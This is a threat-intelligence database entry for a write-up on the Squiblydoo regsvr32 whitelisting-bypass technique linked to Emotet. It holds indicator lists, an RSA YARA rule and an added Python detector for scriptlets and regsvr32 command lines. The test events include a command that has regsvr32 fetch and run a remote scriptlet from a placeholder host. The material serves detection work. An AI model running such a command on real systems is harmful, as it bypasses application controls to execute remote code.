Incident Response Games — #1 EMOTET | Squiblydoo
Common Information
Type Value
UUID 1a6c1036-2d0a-472e-8047-1215bd6a8bae
Fingerprint b424190ca9f506d1
Analysis status DONE
Considered CTI value 2
Text language
Published May 7, 2023, 7:41 a.m.
Added to db May 7, 2023, 9:48 a.m.
Last updated Nov. 17, 2024, 6:54 p.m.
Headline Incident Response Games — #1 EMOTET | Squiblydoo
Title Incident Response Games — #1 EMOTET | Squiblydoo
Detected Hints/Tags/Attributes 59/2/48
RSS Feed
Id   Feed title                Url                                        Added to db
167  Cybersecurity on Medium   https://medium.com/feed/tag/cybersecurity  2024-08-30 22:08
171  Malware on Medium         https://medium.com/feed/tag/malware        2024-08-30 22:08
Attributes
Type                        #Events  Value
Domain                           93  bazaar.abuse.ch
Domain                          145  threatpost.com
Domain                           32  lolbas-project.github.io
Domain                           11  filescan.io
Domain                            3  laposte.net
Domain                            1  olivierlanglois.net
Domain                            2  subt0x10.blogspot.com
Email                             1  marclacroixlanglois@laposte.net
Email                             1  olivier@olivierlanglois.net
File                            459  regsvr32.exe
File                             62  scrobj.dll
File                              1  nghiru.exe
File                              1  bf757fc27bc718f99334d289d95394a7d4db443a23fd61a4731a00bb5bd8d4a7.exe
File                              1  c:\windows\system32\oealmot\auqznoxmif.dll
File                              1  auqznoxmif.dll
File                           1260  explorer.exe
File                              1  c:\users\keecfmwgj\desktop\nghiru.exe
File                             23  c:\windows\system32\regsvr32.exe
File                            185  shell32.dll
File                            229  advapi32.dll
File                             83  crypt32.dll
File                            748  kernel32.dll
File                              9  oleacc.dll
File                             47  oleaut32.dll
File                             69  shlwapi.dll
File                            291  user32.dll
File                             19  winspool.drv
File                             30  comctl32.dll
File                              3  bypass-application-whitelisting-script.html
md5                               1  bccc6d71afc053a5af18142c4926be98
sha1                              1  3b5636fbd1f27a0fccce547d6579dc7c6a4c99d9
sha256                            1  bf757fc27bc718f99334d289d95394a7d4db443a23fd61a4731a00bb5bd8d4a7
MITRE ATT&CK Techniques          13  T1564.004
MITRE ATT&CK Techniques          66  T1564.003
MITRE ATT&CK Techniques         115  T1571
MITRE ATT&CK Techniques         433  T1057
Url                               1  https://bazaar.abuse.ch/sample/bf757fc27bc718f99334d289d95394a7d4db443a23fd61a4731a00bb5bd8d4a7
Url                               1  https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333
Url                               1  https://lolbas-project.github.io/lolbas/binaries/regsvr32/
Url                               1  http://www.amazon.com/exec/obidos/redirect?link_code=ur2&tag=olivielanglos-20&camp=1789&creative=9325&path=http://www.amaz
Url                               1  http://www.olivierlanglois.net9mailto:olivier@olivierlanglois.net?subject=clover
Url                               1  https://community.rsa.com/community/products/netwitness/blog/2016/04/26/detection-of-com-whitelist-bypassing-with-ecat
Url                               2  http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html
Windows Registry Key              1  HKEY_CLASSES_ROOT\ocxfile\AutoRegister
Windows Registry Key              1  HKEY_CLASSES_ROOT\dllfile\AutoRegister
Windows Registry Key              3  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser
Windows Registry Key              1  HKEY_CLASSES_ROOT\ocxfile
Yara rule                         1  (rule text follows)
rule RSA_IR_Windows_COM_bypass_script {
	meta:
		author = "RSA IR"
		Date = "22 Apr 2016"
		reference = "https://community.rsa.com/community/products/netwitness/blog/2016/04/26/detection-of-com-whitelist-bypassing-with-ecat"
		comment1 = "Detects potential scripts used by COM+ Whitelist Bypass"
		comment2 = "More information on bypass located at: http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html"
	strings:
		$s1 = "<scriptlet>" nocase
		$s2 = "<registration" nocase
		$s3 = "classid=" nocase
		$s4 = "[CDATA[" nocase
		$s5 = "</script>" nocase
		$s6 = "</registration>" nocase
		$s7 = "</scriptlet>" nocase
	condition:
		all of ($s*)
}
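The attributes above (regsvr32.exe, scrobj.dll, the LOLBAS regsvr32 page, subTee's application-whitelisting-bypass post) describe the Squiblydoo technique: regsvr32 is told to "install" a remote COM scriptlet via scrobj.dll, and the RSA IR YARA rule catches the scriptlet file itself. The following is an added example, not code from the original Medium post, from the RSA rule's authors or from any tool the page cites. It re-implements the rule's condition (all seven markers, case-insensitive) in plain Python so it runs without the yara module, and adds a process command-line check for the regsvr32 + scrobj.dll + /i: shape. The scriptlet, HTML page and process-creation events are constructed test data; example.com, the pids and the file names are placeholders, and the scriptlet payload is an inert echo.

```python
"""Squiblydoo detection helpers: scriptlet content (mirrors the RSA IR YARA
rule) and regsvr32 command-line shape.  Added example; all inputs constructed."""
import re

# The seven markers of RSA_IR_Windows_COM_bypass_script; the rule needs all
# of them and every string is `nocase`.
SCRIPTLET_MARKERS = (
    b"<scriptlet>", b"<registration", b"classid=", b"[CDATA[",
    b"</script>", b"</registration>", b"</scriptlet>",
)


def matches_com_bypass_rule(data: bytes) -> bool:
    """Plain-Python equivalent of `condition: all of ($s*)` with `nocase`."""
    lowered = data.lower()
    return all(marker.lower() in lowered for marker in SCRIPTLET_MARKERS)


_TOKEN_RE = re.compile(r'"[^"]*"|\S+')            # keep quoted paths as one token
_INSTALL_RE = re.compile(r"^[/-]i:(.*)$", re.IGNORECASE)
_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def _basename(token: str) -> str:
    """Lower-cased file name of a (possibly quoted) Windows path."""
    return token.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify_regsvr32(cmdline: str) -> dict:
    """Break a process command line into Squiblydoo indicators.

    suspicious: image is regsvr32, scrobj.dll is an argument and an /i: install
                string is present, i.e. `regsvr32 /s /n /u /i:<scriptlet> scrobj.dll`.
    remote:     the /i: target is a URL rather than a local path.
    """
    tokens = _TOKEN_RE.findall(cmdline)
    if not tokens:
        return {"regsvr32": False, "scrobj": False, "install_arg": None,
                "remote": False, "suspicious": False}
    is_regsvr32 = _basename(tokens[0]) in ("regsvr32.exe", "regsvr32")
    has_scrobj = any(_basename(t) == "scrobj.dll" for t in tokens[1:])
    install_arg = None
    for t in tokens[1:]:
        m = _INSTALL_RE.match(t.strip('"'))
        if m:
            install_arg = m.group(1).strip('"')
            break
    remote = bool(install_arg and _URL_RE.match(install_arg))
    return {
        "regsvr32": is_regsvr32,
        "scrobj": has_scrobj,
        "install_arg": install_arg,
        "remote": remote,
        "suspicious": is_regsvr32 and has_scrobj and install_arg is not None,
    }


def scan_events(events) -> list:
    """Pids of process-creation events whose command line looks like Squiblydoo."""
    return [e["pid"] for e in events if classify_regsvr32(e["cmdline"])["suspicious"]]


# Constructed scriptlet in the shape the YARA rule targets; the payload only echoes.
SAMPLE_SCT = b"""<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Example.Scriptlet"
    classid="{00000000-0000-0000-0000-000000000001}" >
    <script language="JScript">
        <![CDATA[
            WScript.Echo("scriptlet body ran");
        ]]>
    </script>
</registration>
</scriptlet>
"""

# Constructed benign page: has <script>/</script> but no scriptlet/registration tags.
BENIGN_HTML = b"<html><head><script>var x=1;</script></head><body>hi</body></html>"

# Constructed process-creation events (pids and paths are placeholders).
SAMPLE_EVENTS = [
    {"pid": 1001, "cmdline": r'"C:\Windows\System32\regsvr32.exe" /s /n /u /i:http://example.com/payload.sct scrobj.dll'},
    {"pid": 1002, "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"pid": 1003, "cmdline": r'regsvr32 /s /n /u /i:C:\Users\Public\stage.sct scrobj.dll'},
    {"pid": 1004, "cmdline": r'rundll32.exe shell32.dll,Control_RunDLL'},
]

if __name__ == "__main__":
    print("scriptlet matches rule:", matches_com_bypass_rule(SAMPLE_SCT))
    print("benign html matches rule:", matches_com_bypass_rule(BENIGN_HTML))
    for ev in SAMPLE_EVENTS:
        print(ev["pid"], classify_regsvr32(ev["cmdline"]))
    print("flagged pids:", scan_events(SAMPLE_EVENTS))
```

The command-line check deliberately fires on a local /i: target as well as a URL (event 1003 above), since the scriptlet can be staged to disk first; `remote` is reported separately so a rule can weight the two cases differently. A legitimate `regsvr32 /s vendor.dll` (event 1002) has no scrobj.dll and no /i: string and is not flagged.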